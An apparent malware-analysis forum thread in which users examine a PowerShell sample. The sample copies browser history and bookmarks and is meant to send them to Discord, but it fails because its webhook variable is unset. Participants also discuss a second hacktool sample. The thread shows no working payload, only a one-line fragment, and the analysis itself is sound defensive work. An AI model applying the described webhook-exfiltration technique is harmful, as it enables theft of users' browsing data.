Malware Analysis Evasive Stealer or Broken Sample?

Xeno1234

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
Possible Powershell Password Stealer I came across. Marked as clean via multiple online analysis sites but in the code it appears to take passwords and upload them to discord. Might be broken as multiple errors are displayed.
Could someone take a deeper look?

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'browserData.ps1'

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.
www.hybrid-analysis.com www.hybrid-analysis.com

Triage | Behavioral Report

Have a look at the Hatching Triage automated malware analysis report for this sample, with a score of 1 out of 10.
tria.ge tria.ge

Kaspersky Threat Intelligence Portal

Kaspersky Threat Intelligence Portal allows you to scan files, domains, IP addresses, and URLs for threats, malware, viruses
opentip.kaspersky.com opentip.kaspersky.com
 
  • Like
Reactions: Trident, Zartarra and Nevi
WhiteMouse

WhiteMouse

Level 5
Verified
Well-known
Apr 19, 2017
237
It doesn't seem like a password stealer to me. It only copy history and browser bookmarks to Temp\BrowserData.txt.

507250409533.png
 
  • Like
Reactions: simmerskool, Trident and Nevi
L

likeastar20

Level 8
Verified
Mar 24, 2016
361
Didn’t test it/look at the code, but check the VT analysis:

“…Overall, the code seems to be designed to extract browser data and upload it to Discord, potentially for malicious purposes…”
 
Last edited:
  • Like
Reactions: simmerskool and Trident
Xeno1234

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
I’ve looked at this file a bit more and it appears to be a broken sample.

In all of the sandboxes, I’m 99% no discord webhook request was made (which is how it should transfer the data). Therefore the data just stays on the system.
 
  • Like
Reactions: Trident
struppigel

struppigel

Moderator
Verified
Staff Member
Well-known
Apr 9, 2020
656
With this file not being obfuscated it is quite straightforward to determine what it does and that is copying bookmarks and history of Chrome, Firefox, Edge and Opera to BookMarks.txt and uploading this to Discord as indicated by the PowerShell function name.

What is missing, is the context where and how this Powershell code is being used.
This part of the code references a variable $dc
$hookurl = "$dc"
Click to expand...

This variable is not set, but it should contain the upload location for Discord. This is also the reason why it is not working. There is no evasion going on, it is just incomplete.

Without context it can be hard to determine if such a file is malicious or clean. However, in this case, I would give it a malware verdict, because I cannot imagine any legitimate reason to upload such data to Discord.

There might be a small chance that some legitimate application has an edge case for doing this, but as a malware analyst I would decide to detect this as malware until someone complains, because in all cases I have seen so far such a functionality was in context of a stealer or RAT with stealing functionality, using Discord channels to communicate and exfiltrate data.

It is odd though, that the code is not obfuscated. I can imagine this being the result of an AMSI dump, it being the code after unpacking, or being some template or example code for a malware.
 
  • Like
  • +Reputation
  • Thanks
Reactions: simmerskool, Jonny Quest, oldschool and 9 others
Xeno1234

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.
tria.ge tria.ge

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com
Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

Detected by Falcon Sandbox
 
Last edited:
  • Like
Reactions: Nevi, likeastar20 and Trident
Xeno1234

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
Xeno1234 said:
I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.
tria.ge tria.ge

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com
Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

Detected by Falcon Sandbox
Click to expand...
Kaspersky added Signatures. Fully undetected by Checkpoint Harmony yesterday
 
L

likeastar20

Level 8
Verified
Mar 24, 2016
361
Xeno1234 said:
Kaspersky added Signatures. Fully undetected by Checkpoint Harmony yesterday
Click to expand...
Xeno1234 said:
I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.
tria.ge tria.ge

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com
Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

Detected by Falcon Sandbox
Click to expand...
Interesting detection name by Kaspersky
 
  • Like
Reactions: Nevi, simmerskool, Xeno1234 and 1 other person
struppigel

struppigel

Moderator
Verified
Staff Member
Well-known
Apr 9, 2020
656
Xeno1234 said:
I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.
tria.ge tria.ge

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com
Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

Detected by Falcon Sandbox
Click to expand...

Assuming from the screenshot and the configuration file contents, it is a malware spreading hacktool.
I do not see similarity to the earlier sample.

1697078447078.png


1697078616552.png
 
  • +Reputation
  • Like
Reactions: upnorth, Nevi, Xeno1234 and 2 others

Similar threads

L
    • Like
    • +Reputation
Malware Analysis Tricky adware or malicious ?
Replies
10
Views
935
Malware Analysis
likeastar20
L
L
    • Like
    • +Reputation
Evasive Sample
Replies
12
Views
1,683
Malware Analysis Archive
piquiteco
piquiteco
Sandbox Breaker
    • Like
  • Locked
Evasive VBS with very low VT
Replies
74
Views
4,302
Malware Analysis Archive
Sandbox Breaker
Sandbox Breaker

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top